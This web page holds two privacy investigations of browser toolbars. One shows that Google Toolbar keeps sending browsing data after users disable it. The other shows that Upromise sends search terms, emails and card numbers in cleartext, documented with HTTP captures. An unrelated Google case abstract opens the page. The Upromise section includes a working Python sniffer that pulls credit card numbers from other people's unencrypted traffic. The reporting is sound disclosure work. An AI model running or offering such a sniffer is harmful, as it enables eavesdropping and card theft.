Describes Google’s history, business model, governance structure, corporate culture, and processes for managing innovation. Reviews Google’s recent strategic initiatives and the threats they pose to Yahoo, Microsoft, and others. Asks what Google should do next. One option is to stay focused on the company’s core competence, i.e., developing superior search solutions and monetizing them through targeted advertising. Another option is to branch into new arenas, for example, build Google into a portal like Yahoo or MSN; extend Google’s role in e-commerce beyond search, to encompass a more active role as an intermediary (like eBay) facilitating transactions; or challenge Microsoft’s position on the PC desktop by developing software to compete with Office and Windows.
Supplements:
Google Inc. (Abridged) – Case (HBP 910032)
Teaching Materials:
Google Inc. and Google Inc. (Abridged) – Teaching Note (HBP 910050)
Google Toolbar Tracks Browsing Even After Users Choose "Disable"
Disclosure: I serve as co-counsel in unrelated litigation against Google, Vulcan Golf et al. v. Google et al. I also serve as a consultant to various companies that compete with Google. But I write on my own — not at the suggestion or request of any client, without approval or payment from any client.
Run the Google Toolbar, and it’s strikingly easy to activate “Enhanced Features” — transmitting to Google the full URL of every page-view, including searches at competing search engines. Some critics find this a significant privacy intrusion (1, 2, 3). But in my testing, even Google’s bundled toolbar installations provide some modicum of notice before installing. And users who want to disable such transmissions can always turn them off – or so I thought until I recently retested.
In this article, I provide evidence calling into question the ability of users to disable Google Toolbar transmissions. I begin by reviewing the contents of Google’s "Enhanced Features" transmissions. I then offer screenshot and video proof showing that even when users specifically instruct that the Google Toolbar be “disable[d]”, and even when the Google Toolbar seems to be disabled (e.g., because it disappears from view), Google Toolbar continues tracking users’ browsing. I then revisit how Google Toolbar’s Enhanced Features get turned on in the first place – noting the striking ease of activating Enhanced Features, and the remarkable absence of a button or option to disable Enhanced Features once they are turned on. I criticize the fact that Google’s disclosures have worsened over time, and I conclude by identifying changes necessary to fulfill users’ expectations and protect users’ privacy.
"Enhanced Features" Transmissions Track Page-Views and Search Terms
Certain Google Toolbar features require transmitting to Google servers the full URLs users browse. For example, to tell users the PageRank of the pages they browse, the Google Toolbar must send Google servers the URL of each such page. Google Toolbar’s “Related Sites” and “Sidewiki” (user comments) features also require similar transmissions.
With a network monitor, I confirmed that these transmissions include the full URLs users visit – including domain names, directories, filenames, URL parameters, and search terms. For example, I observed the transmission below when I searched Yahoo (green highlighting) for "laptops" (yellow).
GET /search?client=navclient-auto&swwk=358&iqrn=zuk&orig=0gs08&ie=UTF-8&oe=UTF-8&querytime=kV&querytimec=kV &features=Rank:SW:&q=info:http%3a%2f%2frds.yahoo.com%2f_ylt%3dA0oGkl32p1tLT2EB8ohXNyoA%2fSIG%3d18045klhr%2f
EXP%3d1264384374%2f**http%253a%2f%2fsearch.yahoo.com%2fsearch%253fp%3dlaptops%2526fr%3dsfp%2526xargs%3d12KP
jg1itSroGmmvmnEOOIMLrcmUsOkZ7Fo5h7DOV5CtdY6hNdE%25252DIfXpP0xZg6WO8T7xvSy7HBreVFdJGu277WVk0qfeG%25255FGOW%2
5255F772GnNVme5ujWkF3s%25252DJ%25255F0%25252Dmdn4RvDE8%25252E%2526pstart%3d7%2526b%3d11&googleip=O;72.14.20
4.104;226&ch=711984234986 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; GoogleToolbar 6.4.1208.1530; Windows XP 5.1; MSIE 8.0.6001.18702)
Accept-Language: en
Host: toolbarqueries.google.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: PREF=ID=…
HTTP/1.1 200 OK …
Screenshots – Google Toolbar Continues Tracking Browsing Even When Users "Disable" the Toolbar via Its "X" Button
Consistent with modern browser plug-in standards, the current Google Toolbar features an “X” button to disable the toolbar:
I clicked the “X” and received a confirmation window:
I chose the top option and pressed OK. The Google Toolbar disappeared from view, indicating that it was disabled for this window, just as I had requested. Within the same window, I requested the Whitehouse.gov site:
Although I had asked that the Google Toolbar be "disable[d] … for this window " and although the Google Toolbar disappeared from view, my network monitor revealed that Google Toolbar continued to transmit my browsing to its toolbarqueries.google.com server:
See also a screen-capture video memorializing these transmissions.
These Nonconsensual Transmissions Affect Important, Routine Scenarios (added 1/26/10, 12:15pm)
In a statement to Search Engine Land, Google argued that the problems I reported are "only an issue until a user restarts the browser." I emphatically disagree.
Consider the nonconsensual transmission detailed in the preceding section: A user presses "x", is asked "When do you want to disable Google Toolbar and its features?", and chooses the default option, to "Disable Google Toolbar only for this window." The entire purpose of this option is to take effect immediately. Indeed, it would be nonsense for this option to take effect only upon a browser restart: Once the user restarts the browser, the "for this window" disabling is supposed to end, and transmissions are supposed to resume. So Google Toolbar transmits web browsing before the restart, and after the restart too. I stand by my conclusion: The "Disable Google Toolbar only for this window" option doesn’t work at all: It does not actually disable Google Toolbar for the specified window, not immediately and not upon a restart.
Crucially, these nonconsensual transmissions target users who are specifically concerned about privacy. A user who requests that Google Toolbar be disabled for the current window is exactly seeking to do something sensitive, confidential, or embarrassing, or in any event something he does not wish to record in Google’s logs. This privacy-conscious user deserves extra privacy protection. Yet Google nonetheless records his browsing. Google fails this user — specifically and unambiguously promising to immediately stop tracking when the user so instructs, but in fact continuing tracking unabated.
Google Toolbar Continues Tracking Browsing Even When Users "Disable" the Toolbar via "Manage Add-Ons"
Internet Explorer 8 includes a Manage Add-Ons screen to disable unwanted add-ons. On a PC with Google Toolbar, I activated Manage Add-Ons, clicked the Google Toolbar entry, and chose Disable. I accepted all defaults and closed the dialog box.
Again I requested the whitehouse.gov site. Again my network monitor revealed that Google Toolbar continued to transmit my browsing to its toolbarqueries.google.com server. Indeed, as I requested various pages on the whitehouse.gov site, Google Toolbar transmitted the full URLs of those pages, as shown in the second and third circles below.
See also a screen-capture video memorializing these transmissions.
In a further test, performed January 23, I reconfirmed the observations detailed here. In that test, I demonstrated that even checking the "Google Toolbar Notifier BHO" box and disabling that component does not impede these Google Toolbar transmissions. I also specifically confirmed that these continuing Google Toolbar transmissions track users’ searches at competing search engines. See screen-capture video.
In my tests, in this Manage Add-Ons scenario, Google Toolbar transmissions cease upon the next browser restart. But no on-screen message alerts the user that a browser restart is needed for the change to take effect, so the user has no reason to think a restart is required.
Google Toolbar Continues Tracking Browsing When Users "Disable" the Toolbar via Right Click (added 1/26/10 11:00pm)
Danny Sullivan asked me whether Google Toolbar continues Enhanced Features transmissions if users hide Google Toolbar via IE’s right-click menu. In a further test, I confirmed that Google Toolbar transmissions continue in these circumstances. Below are the four key screenshots: 1) I right-click in empty toolbar space, and I uncheck Google Toolbar. 2) I check the final checkbox and choose Disable. 3) Google Toolbar disappears from view and appears to be disabled. I browse the web. 4) I confirm that Google Toolbar’s transmissions nonetheless continue. See also a screen-capture video.
Users May Easily or Accidentally Activate “Enhanced Features” Transmissions
The above-described transmissions occur only if a user runs Google Toolbar in its “Enhanced Features” mode. But it is strikingly easy for a user to stumble into this mode.
For one, the standard Google Toolbar installation encourages users to activate Enhanced Features via a “bubble” message shown at the conclusion of installation. See the screenshot at right. This bubble presents a forceful request for users to activate Sidewiki: The feature is described as “enhanced” and “helpful”, and Google chooses to tout it with a prominence that indicates Google views the feature as important. Moreover, the accept button features bold type plus a jumbo size (more than twice as large as the button to decline). And the accept button has the focus – so merely pressing Space or Enter (easy to do accidentally) serves to activate Enhanced Features without any further confirmation.
I credit that the bubble mentions the important privacy consequence of enabling Enhanced Features: “For enhanced features to work, Toolbar has to tell us what site you’re visiting by sending Google the URL.” But this disclosure falls importantly short. For one, Enhanced Features transmits not just “sites” but specific full URLs, including directories, filenames, URL parameters, and search keywords. Indeed, Google’s bubble statement is internally inconsistent – referring to transmissions of “sites” and “URLs” as if those were the same thing, when in fact the latter is far more intrusive than the former, and it is the latter that accurately describes what is sent.
The bubble also falls short in its presentation of Google Toolbar’s Privacy Policy. If a user clicks the Privacy Policy hyperlink, the user sees the window shown in the left image below. Notice that the Privacy Policy loads in an unusual window with no browser chrome – no Edit-Find option to let a user search for words of particular interest, no Edit-Select All and Edit-Copy option to let a user copy text to another program for further review, no Save or Print options to let a user preserve the file. Had Google used a standard browser window, all these features would have been available, but by designing this nonstandard window, Google creates all these limitations. The substance of the document is also inapt. For one, “Enhanced Toolbar Features” receive no mention whatsoever until the fifth on-screen page (right image below). Even there, the first bullet describes transmission of “the addresses [of] the sites” users visit – again falsely indicating transmission of mere domain names, not full URLs. The second bullet mentions transmission of “URL[s]” but says such transmission occurs “[w]hen you use Sidewiki to write, edit, or rate an entry.” Taken together, these two bullets falsely indicate that URLs are transmitted only when users interact with Sidewiki, and that only sites are transmitted otherwise, when in fact URLs are transmitted whenever Enhanced Features are turned on.
Certain bundled installations make it even easier for users to get Google Toolbar unrequested, and to end up with Enhanced Features too. Google Toolbar has dozens of distribution partners using varying installation tactics, so a full review of their practices is beyond the scope of this article. But these bundles provide significant additional cause for concern.
Enhanced Features: Easy to Enable, Hard to Turn Off
The preceding sections show that users can enable Google Toolbar’s Enhanced Features with a single click on a prominent, oversized button. But disabling Enhanced Features is much harder.
Consider a user who changes her mind about Enhanced Features but wishes to keep Google Toolbar in its basic mode. How exactly can she do so? Browsing the Google Toolbar’s entire Options screen, I found no option to disable Enhanced Features. Indeed, Enhanced Features can be enabled with a single click, during installation (as shown above) or thereafter, but disabling them seems to require uninstalling Google Toolbar altogether; certainly there is no comparably quick command.
I’m reminded of The Eagles’ Hotel California: "you can check out any time you like, but you can never leave." And of course, as discussed above, a user who chooses the X button or Manage Add-Ons will naturally believe the Google Toolbar is disabled, when in fact it continues transmissions unabated.
Google Toolbar Disclosures Have Worsened Over Time
I first wrote about Google Toolbar’s installation and privacy disclosures in my March 2004 FTC comments on spyware and adware. In that document, I praised Google’s then-current toolbar installation sequence, which featured the impressive screen shown at right.
I praised this screen with the following discussion:
I consider this disclosure particularly laudable because it features the following characteristics: It discusses privacy concerns on a screen dedicated to this topic, separate from unrelated information and separate from information that may be of lesser concern to users. It uses color and layout to signal the importance of the information presented. It uses plain language, simple sentences, and brief paragraphs. It offers the user an opportunity to opt out of the transmission of sensitive information, without losing any more functionality than necessary (given design constraints), and without suffering penalties of any kind (e.g. forfeiture of use of some unrelated software). As a result of these characteristics, users viewing this screen have the opportunity to make a meaningful, informed choice as to whether or not to enable the Enhanced Features of the Google Toolbar.
I stand by that praise. But six years later, Google Toolbar’s installation sequence is inferior in every way:
- Now, initial Enhanced Features privacy disclosures appear not in their own screen, but in a bubble pitching another feature (Sidewiki). Previously, format (all-caps, top-of-page), color (red) and language ("… not the usual yada yada") alerted users to the seriousness of the decision at hand.
- Now, Google presents Enhanced Features as a default with an oversized button, bold type, and acceptance via a single keystroke. Previously, neither option was a default, and both options were presented with equal prominence.
- Now, privacy statements are imprecise and internally-inconsistent, muddling the concepts of site and URL. Previous disclosures were clear in explaining that acceptance entails "sending us [Google] the URL" of each page a user visits.
- The current feature name, "Enhanced Features," is less forthright than the prior "Advanced Features" label. The name "Advanced Features" appropriately indicated that the feature is not appropriate for all users (but is intended for, e.g., "advanced" users). In contrast, the current "Enhanced Features" name suggests that the feature is an "enhancement" suitable for everyone.
Google’s Undisclosed Taskbar Button
The Google Toolbar also added a “Google” button to my Taskbar, immediately adjacent to the Start button. The Toolbar installer added this button without any disclosure whatsoever in the installation sequence – not on the toolbar.google.com web page, not in the installer EXE, not anywhere else.
An in-Taskbar button is not consistent with ordinary functions users reasonably expect when they seek and install a “toolbar.” Because this function arrives on a user’s computer without notice and without consent, it is an improper intrusion.
To remedy these problems, Google’s first step is simple: Fix the Toolbar so that X and Manage Add-Ons in fact do what they promise. When a user disables Google Toolbar, all Enhanced Features transmissions need to stop, immediately and without exception. This change must be deployed to all Google Toolbar users straightaway.
Google also needs to clean up the results of its nonconsensual data collection. In particular, Google has collected browsing data from users who specifically declined to allow such data to be collected. In some instances this data may be private, sensitive, or embarrassing: Savvy users would naturally choose to disable Google Toolbar before their most sensitive searches. Google ordinarily doesn’t let users delete their records as stored on Google servers. But these records never should have been sent to Google in the first place. So Google should find a way to let concerned users request that Google fully and irreversibly delete their entire Toolbar histories.
Even when Google fixes these nonconsensual transmissions, larger problems remain. The current Toolbar installation sequence suffers inconsistent statements of privacy consequences, with poor presentation of the full Toolbar Privacy Statement. Toolbar adds a button to users’ Taskbar unrequested. And as my videos show, once Google puts its code on a user’s computer, there’s nothing to stop Google from tracking users even after users specifically decline. I’ve run Google Toolbar for nearly a decade, but this week I uninstalled Google Toolbar from all my PCs. I encourage others to do the same.
Upromise Savings — At What Cost? (updated January 25, 2010)
Upromise touts opportunities for college savings. When members shop at participating online merchants, dine at participating restaurants, or purchase selected products at retail stores, Upromise collects commissions which fund college savings accounts.
Unfortunately, the Upromise Toolbar also tracks users’ behavior in excruciating detail. In my testing, after I checked an innocuously labeled box promising "Personalized Offers," the Upromise Toolbar tracked and transmitted my every page-view, every search, and every click, along with many entries into web forms. Remarkably, these transmissions included full credit card numbers — grabbed out of merchants’ HTTPS (SSL) secure communications, yet transmitted by Upromise in plain text, readable by anyone using a network monitor or other recording system.
Proof of the Specific Transmissions
I began by running a search at Google. The Upromise toolbar transmissions reported the full URL I requested, including my search provider (yellow) and my full search keywords (green).
POST /fast-cgi/ClickServer HTTP/1.0
User-Agent: upromise/3195/3195/UP23806818/0012
Host: dcs.consumerinput.com
Content-Length: 274
Connection: Keep-Alive
md5=ee593c14f70c1b7f8b3341a91c3e3639&ts=1264045792.140&bua=N%2FA&meth=get&eid=300&fid=NULL&bin=24af1f0
&refererHeader=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F&url=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3D
en%26source%3Dhp%26q%3Di%2Bfeel%2Bsick%26aq%3Df%26aql%26aqi%3Dg10%26oq
HTTP/1.1 200 OK
Date: Thu, 21 Jan 2010 03:49:51 GMT
Server: Apache/2.2.3 (Debian) mod_python/3.3.1 Python/2.5.1 mod_ssl/2.2.3 OpenSSL/0.9.8c
Connection: close
Content-Type: text/html; charset=UTF-8
<capture>
<md5>ee593c14f70c1b7f8b3341a91c3e3639</md5>
<version>1.0</version>
</capture>
I clicked a result — a page on Wikipedia. Transmissions included the full URL of my request (blue) as well as the web search provider (yellow) and keywords (green) that had referred me (red) to this site.
POST /fast-cgi/ClickServer HTTP/1.0
User-Agent: upromise/3195/3195/UP23806818/0012
Host: dcs.consumerinput.com
Content-Length: 304
Connection: Keep-Alive
md5=ee7e3174db149d0d97f51b10db9ac58d&ts=1264045931.921&bua=N%2FA&meth=get&eid=300&fid=NULL&bin=24af1f0
&refererHeader=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26source%3Dhp%26q%3Di%2Bfeel%2Bsick%
26aq%3Df%26aql%3D%26aqi%3Dg10%26oq%3D&url=http%3A%2F%2Fen%2Ewikipedia%2Eorg%2Fwiki%2FI%5FFeel%5FSick
HTTP/1.1 200 OK
Date: Thu, 21 Jan 2010 03:52:11 GMT
Server: Apache/2.2.3 (Debian) mod_python/3.3.1 Python/2.5.1 mod_ssl/2.2.3 OpenSSL/0.9.8c
Connection: close
Content-Type: text/html; charset=UTF-8
<capture>
<md5>ee7e3174db149d0d97f51b10db9ac58d</md5>
<version>1.0</version>
</capture>
I browsed onwards to Buy.com (grey), where I added an item to my shopping cart and proceeded to checkout. When prompted, I entered a (made-up) credit card number. Buy.com appropriately secured the card number with HTTPS encryption. But, remarkably, Upromise extracted and transmitted the full sixteen-digit card number (yellow) — as well as my (also fictitious) CVV code (green), and expiration date (blue).
POST /fast-cgi/ClickServer HTTP/1.0
User-Agent: upromise/3195/3195/UP23806818/0012
Host: dcs.consumerinput.com
Content-Length: 1936
Connection: Keep-Alive
md5=352732ac9ee0d9e970f3c65d62ed03b1&ts=1264046115.702&bua=N%2FA&meth=post&eid=300&fid=NULL&bin=24af1f0
&refererHeader=https%3A%2F%2Fssl%2Ebuy%2Ecom%2FCO%2FCheckout%2FpaymentOptions%2Easpx&url=https%3A%2F%2F
ssl%2Ebuy%2Ecom%2FCO%2FCheckout%2FpaymentOptions%2Easpx%3F%5F%5FEVENTTARGET%26%5F%5FEVENTARGUMENT%26%5F
%5FVIEWSTATE%3D%2FwEPDwUKMTQ1MjY3MzM2Mw9kFgQCAw9kFgQCAQ8PFgIeCEltYWdlVXJsBV1odHRwczovL2EyNDguZS5ha2FtYW
kubmV0L2YvMjQ4Lzg0NS8xMGgvaW1hZ2VzLmJ1eS5jb20vYnV5X2Fzc2V0cy92Ni9oZWFkZXIvMjAwNi9idXlfbG9nby5naWZkZAICD
w8WAh8ABXdodHRwczovL2EyNDguZS5ha2FtYWkubmV0L2YvMjQ4Lzg0NS8xMGgvaW1hZ2VzLmJ1eS5jb20vYnV5X2Fzc2V0cy92Ni9j
b3JwL2NoZWNrb3V0X3Byb2Nlc3MvY2hlY2tvdXRfM19wYXltZW50X2dyZWVuLmdpZmRkAgUPZBYQAgUPZBYCZg9kFgRmDw8WBB8ABVN
odHRwczovL2EyNDguZS5ha2FtYWkubmV0L2YvMjQ4Lzg0NS8xMGgvaW1hZ2VzLmJ1eS5jb20vYnV5X2Fzc2V0cy9jcy9pbWFnZXMvYm
1sLmdpZh4HVmlzaWJsZWdkZAIBDw8WAh8ABWNodHRwczovL2EyNDguZS5ha2FtYWkubmV0L2YvMjQ4Lzg0NS8xMGgvaW1hZ2VzLmJ1e
S5jb20vYnV5X2Fzc2V0cy9idXR0b25zLzIwMDgvYnV0dG9uX2NvbnRpbnVlMi5naWZkZAIHD2QWAmYPZBYKAgUPEA9kFgIeB29uY2xp
Y2sFKFNldFVuaXF1ZVJhZGlvQnV0dG9uKCdyZG9QYXltZW50cycsdGhpcylkZGQCBw8QD2QWAh4Ib25DaGFuZ2UFG2phdmFzY3JpcHQ
6c2hvd0hpZGVDQyh0aGlzKWRkZAIJDw9kFgIfAgUfc3dpdGNoUmFkaW8oJ3Jkb05ld0NyZWRpdENhcmQnKWQCDQ8QZA8WDWYCAQICAg
MCBAIFAgYCBwIIAgkCCgILAgwWDRAFBDIwMTAFBDIwMTBnEAUEMjAxMQUEMjAxMWcQBQQyMDEyBQQyMDEyZxAFBD%2A%2A%2A%2A%7B
1422%7D%26%5F%5FEVENTVALIDATION%3D%2FwEWKQLNvonpCgKYm5r9BALB5eOPBALy2ZqvCQLv2ZqvCQLq2ZqvCQLu2ZqvCQLr2ba
vCQL28Nu2CwLDqZ7xDALDqZrxDALDqabxDALDqaLxDALDqa7xDALDqarxDALDqbbxDALDqfLyDALDqf7yDALcqZLxDALcqZ7xDALcqZ
rxDALrtZj9AgLrtaSgCQLrtbAHAuu13OoIAuu16NEPAuu19LQGAuu1gJgNAuu1rP8FAuu1%2BJcHAuu1hPsPAvai%2BtMMAvaihrcDA
vaikpoKAt7CxckKAsqi76gMAva5sdkEAvLqvYoEAoaI4c0FArr3pYIHApibrtgNijCSRDzGArpVaF4m3bbOLp8yvUM%3D%26rdoPaym
ents%3DrdoNewCreditCard%26lstCCType%3D9%26txtNewCCNumber%3D4412124112341234%26lstNewCCMonth%3D01%26lstN
ewCCYear%3D2010%26txtNewCVV2%3D222%26btnContinue2%2Ex%3D18%26btnContinue2%2Ey%3D19
HTTP/1.1 200 OK
Date: Thu, 21 Jan 2010 03:55:15 GMT
Server: Apache/2.2.3 (Debian) mod_python/3.3.1 Python/2.5.1 mod_ssl/2.2.3 OpenSSL/0.9.8c
Connection: close
Content-Type: text/html; charset=UTF-8
<capture>
<md5>352732ac9ee0d9e970f3c65d62ed03b1</md5>
<version>1.0</version>
</capture>
Upromise also transmitted my email address. For example, when I logged into Restaurant.com, Upromise’s transmission included my email (yellow):
POST /fast-cgi/ClickServer HTTP/1.0
User-Agent: upromise/3195/3195/UP23806818/0012
Host: dcs.consumerinput.com
Content-Length: 378
Connection: Keep-Alive
md5=26830cfab132bb3122fcf40d8cd0f2f9&ts=1264049936.327&bua=N%2FA&meth=post&eid=303&fid=NULL&bin=24af1f0
&refererHeader=&url=https%3A%2F%2Fwww%2Erestaurant%2Ecom%2Fregister%2Dlogin%2Easp%3Fpurchasestatus%3DRE
GISTER%2DLOGIN%26hdnButton%3DSignin%26txtMemberSignin%3Dedelman%40pobox%2Ecom%26radio%5Fcust%3Dcustomer
%5Fexisting%26txtMemberPassword…
HTTP/1.1 200 OK
Date: Thu, 21 Jan 2010 04:58:56 GMT
Server: Apache/2.2.3 (Debian) mod_python/3.3.1 Python/2.5.1 mod_ssl/2.2.3 OpenSSL/0.9.8c
Connection: close
Content-Type: text/html; charset=UTF-8
<capture>
<md5>26830cfab132bb3122fcf40d8cd0f2f9</md5>
<version>1.0</version>
</capture>
All the preceding transmissions were made over my ordinary Internet connection just as shown above. In particular, these transmissions were sent in plain text, without encryption of any kind. Any computer with a network monitor (including, for users connected by Wi-Fi, any nearby wireless user) could easily read these communications. With no additional hardware or software, a nearby listener could thereby obtain, e.g., users’ full credit card numbers — even though merchants used HTTPS security to attempt to keep those numbers confidential.
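To illustrate how little effort such eavesdropping would take, here is a minimal Python sketch of the sort of passive listener I describe. It is hypothetical, not a tool I used and not anything from Upromise or Compete. It assumes the third-party scapy library, permission to capture packets, and a vantage point (such as the same open Wi-Fi network) from which the victim’s traffic is visible. The txtNewCCNumber field name comes from the Buy.com capture above; other merchants would use other field names.

# Hypothetical passive listener: watches unencrypted traffic to the tracking
# server named in the captures above and flags any card-number field it sees.
# Requires the scapy library and sufficient privileges to capture packets.
import re
from urllib.parse import unquote
from scapy.all import sniff, TCP, Raw

CARD_FIELD = re.compile(r"txtNewCCNumber=(\d{13,16})")  # field name taken from the Buy.com form

def inspect(pkt):
    # URL-decode each TCP payload and report any card number it contains.
    if pkt.haslayer(TCP) and pkt.haslayer(Raw):
        text = unquote(pkt[Raw].load.decode("latin-1"))
        match = CARD_FIELD.search(text)
        if match:
            print("Card number visible on the wire:", match.group(1))

sniff(filter="tcp port 80 and host dcs.consumerinput.com", prn=inspect, store=False)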
The Destination of Upromise’s Transmissions: Compete, Inc.
As shown in the "host:" header of each of the preceding communications, transmissions flow to the consumerinput.com domain. Whois reports that this domain is registered to Boston, MA traffic-monitoring service Compete, Inc. Compete’s site promises clients access to "detailed behavioral data," and Compete says more than 2 million U.S. Internet users "have given [Compete] permission to analyze the web pages they visit."
Upromise’s Disclosures Misrepresent Data Collection and Fail to Obtain Consumer Consent
Upromise’s installation sequence does not obtain users’ permission for this detailed and intrusive tracking. Quite the contrary: Numerous Upromise screens discuss privacy, yet none mentions the detailed information Upromise actually transmits.
The Upromise toolbar installation page touts the toolbar’s purported benefits at length, but mentions no privacy implications whatsoever.
If a user clicks the prominent button to begin the toolbar installation, the next screen presents a 1,354-word license agreement that fills 22 on-screen pages and offers no way to enlarge, maximize, print, save, or search the lengthy text. But even if a user did read the license, the user would find no notice of the detailed tracking. Meanwhile, the lower on-screen box describes a "Personalized Offers" feature, which it says causes "information about [a user’s] online activity [to be] collected and used to provide college savings opportunities." But that screen nowhere admits collecting users’ email addresses or credit card numbers. Nor would a user rightly expect that "information about … online activity" means a full log of every search and every page-view across the entire web.
The install sequence does link to Upromise’s privacy policy. But this page also fails to admit the detailed tracking Upromise performs. Indeed, the privacy policy promises that Personalized Offers data collection will be "anonymous" — when in fact the transmissions include email addresses and credit card numbers. The privacy policy then claims that any collection of personal information is "inadvertent" and that such information is collected only "potentially." But I found that the information transmissions described above were standard and ongoing.
The privacy policy also limits Upromise’s sharing of information with third parties, claiming that such sharing will include only "non-personally identifiable data." But I found that Upromise was sharing highly sensitive personal information, including email addresses and credit card numbers.
In addition, Upromise’s data transmissions contradict representations in Upromise’s FAQ. The top entry in the FAQ promises that Upromise "has implemented security systems designed to keep [users’] information safe." But transmitting credit card numbers in cleartext is reckless and ill-advised — specifically contrary to standard Payment Card Industry (PCI) rules, and the opposite of "safe." Indeed, in an ironic twist, Upromise’s FAQ goes on to discuss at great length the benefits of SSL encryption — benefits conspicuously absent when Upromise transmits users’ credit card numbers without such encryption.
The Upromise toolbar offers an Options screen which again makes no mention of key data transmissions. The screen admits collecting "information about the web sites you visit." But it says nothing of collecting email addresses, credit card numbers, and more.
The transmissions at issue affect only those users who agree to run Upromise’s Personalized Offers system. But until last week, that option was enabled by default in new Upromise toolbar installations — inviting users to initiate these transmissions without a second look.
Even if Upromise ceased the most outrageous transmissions detailed above, Upromise’s installation disclosures would still give ample basis for concern. To describe tracking, transmitting, and analyzing a user’s every page-view and every search, Upromise’s install screen euphemistically mentions that its "service provider may use non-personally identifiable information about your online activity." This admission appears below a lengthy EULA, under a heading irrelevantly labeled "Personalized Offers" — doing little to draw users’ attention to the serious implications of Personalized Offers. I don’t see why Upromise users would ever want to accept this detailed tracking: It’s entirely unrelated to the college savings that draws users to the Upromise site. But if Upromise is to keep this function, users deserve a clear, precise, and well-labeled statement of exactly what they’re getting into.
Upromise’s multi-faceted business raises other concerns that also deserve a critical look. The implications for affiliate merchants are particularly serious — a risk of paying affiliate commission for users already at a merchant’s site. But I’ll save this subject for another day.
Upromise’s Response (posted: January 23, 2010)
Upromise told PC Magazine’s Larry Seltzer that fewer than 2% of its 12 million members were affected. But 2% of 12 million is 240,000 — a lot!
Upromise staff also wrote to me. I replied with a few questions:
1) How long was the problem in effect?
2) How many users were affected?
3) What caused the problem?
4) I notice that the Upromise toolbar EULA has numerous firmly-worded defensive provisions. (See the entire sections captioned “Disclaimer of Warranty” and “Limitation of Liability” – purporting to disclaim responsibility for a wide variety of problems. And then see Governing Law and Arbitration for a purported limitation on what law governs and how claims may be brought.) For consumers who believe they suffered losses or harms as a result of this problem, will Upromise invoke the defensive provisions in its EULA to attempt to avoid or limit liability?
I’m particularly interested in the answer to the final question. The EULA is awfully one-sided. I appreciate Upromise confirming the serious failure I uncovered. Upromise should also accept whatever legal liability goes with this breach.
Upromise’s Response to My Questions (posted: January 25, 2010)
Upromise replied to my four questions, indicating that the scope of the problem was "approximately 1% of our 12 million members." Upromise did not answer my questions about the duration of the problem, its cause, or the effect of Upromise’s EULA defenses.